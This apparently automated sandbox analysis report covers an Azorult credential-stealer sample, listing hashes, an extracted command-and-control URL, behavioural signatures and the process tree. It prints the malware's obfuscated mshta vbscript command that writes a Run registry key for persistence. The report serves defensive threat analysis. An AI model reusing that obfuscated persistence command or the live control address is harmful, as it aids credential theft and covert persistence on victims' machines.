Analysis
-
max time kernel
80s -
max time network
72s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
03-07-2022 05:18
Static task
static1
Behavioral task
behavioral1
Sample
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
Resource
win10v2004-20220414-en
General
-
Target
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
-
Size
836KB
-
MD5
bab64cf036bc9fd6cc8af20bda3f12e3
-
SHA1
82d47ceefe73b819b0c3dc50460086c090846241
-
SHA256
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c
-
SHA512
ce2f52c4f48c13ac6085446f2089d1668a2c8db136a7b821c6de20791e5f09b7a02db06c2f5333cd365e7235219f4a3edf5f4993a8d56ee25a8a18bd460fd846
Malware Config
Extracted
azorult
http://37.72.175.157:8080/chi/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 1 IoCs
Processes:
COPENS.exepid process 1148 COPENS.exe -
Loads dropped DLL 2 IoCs
Processes:
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exepid process 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udskamningens2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe" mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exeCOPENS.exepid process 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe 1148 COPENS.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
COPENS.exepid process 1148 COPENS.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exedescription pid process target process PID 892 wrote to memory of 948 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 892 wrote to memory of 948 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 892 wrote to memory of 948 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 892 wrote to memory of 948 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 892 wrote to memory of 1148 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe PID 892 wrote to memory of 1148 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe PID 892 wrote to memory of 1148 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe PID 892 wrote to memory of 1148 892 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Udskamningens2"" : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\COPENS.exe"",""REG_SZ"" : window.close")2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\COPENS.exe"C:\Users\Admin\AppData\Local\Temp\COPENS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\COPENS.exeFilesize
836KB
MD53c98a0d1f58b70aa683bea99b3f92811
SHA1bdcae100842c0441de4c8f2ecb5b98ac45a2d139
SHA2566cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
SHA512334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
-
\Users\Admin\AppData\Local\Temp\COPENS.exeFilesize
836KB
MD53c98a0d1f58b70aa683bea99b3f92811
SHA1bdcae100842c0441de4c8f2ecb5b98ac45a2d139
SHA2566cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
SHA512334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
-
\Users\Admin\AppData\Local\Temp\COPENS.exeFilesize
836KB
MD53c98a0d1f58b70aa683bea99b3f92811
SHA1bdcae100842c0441de4c8f2ecb5b98ac45a2d139
SHA2566cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
SHA512334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
-
memory/892-56-0x00000000763B1000-0x00000000763B3000-memory.dmpFilesize
8KB
-
memory/892-62-0x0000000077C50000-0x0000000077DF9000-memory.dmpFilesize
1.7MB
-
memory/892-64-0x0000000077E30000-0x0000000077FB0000-memory.dmpFilesize
1.5MB
-
memory/948-57-0x0000000000000000-mapping.dmp
-
memory/1148-60-0x0000000000000000-mapping.dmp
-
memory/1148-68-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1148-73-0x0000000077C50000-0x0000000077DF9000-memory.dmpFilesize
1.7MB
-
memory/1148-74-0x0000000077E30000-0x0000000077FB0000-memory.dmpFilesize
1.5MB
-
memory/1148-75-0x0000000077E30000-0x0000000077FB0000-memory.dmpFilesize
1.5MB